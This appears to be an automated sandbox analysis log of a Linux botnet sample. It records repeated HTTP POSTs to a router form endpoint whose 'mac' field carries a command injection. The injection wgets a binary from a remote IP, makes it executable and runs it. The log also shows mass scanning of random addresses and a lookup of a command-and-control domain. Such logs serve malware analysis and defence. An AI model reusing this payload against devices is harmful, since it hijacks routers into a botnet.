                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                  Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                  Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.174.221.211
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.250.209.211
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.211.102.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.97.154.202
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.71.18.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.201.176.80
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.29.128.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.223.225.53
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.69.76.4
                  Source: unknownTCP traffic detected without corresponding DNS query: 114.119.225.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.15.207.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.152.109.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.191.56.100
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.140.199.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.96.79.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 156.200.252.50
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.72.185.43
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.64.113.89
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.120.109.31
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.248.78.88
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.45.242.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 17.186.46.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.214.153.213
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.192.109.239
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.54.241.94
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.46.33.69
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.234.228.83
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.32.252.162
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.162.120.1
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.138.207.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.224.168.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.72.225.110
                  Source: unknownTCP traffic detected without corresponding DNS query: 194.47.255.141
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.191.211.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.36.224.221
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.220.185.255
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.89.207.52
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.208.94.197
                  Source: unknownTCP traffic detected without corresponding DNS query: 163.39.215.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.116.115.96
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.32.193.254
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.112.247.251
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.8.4.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.94.130.196
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.73.148.207
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.206.23.96
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.195.101.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 4.213.80.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.17.212.163
                  Source: global trafficDNS traffic detected: DNS query: cnc.bobungbu.com
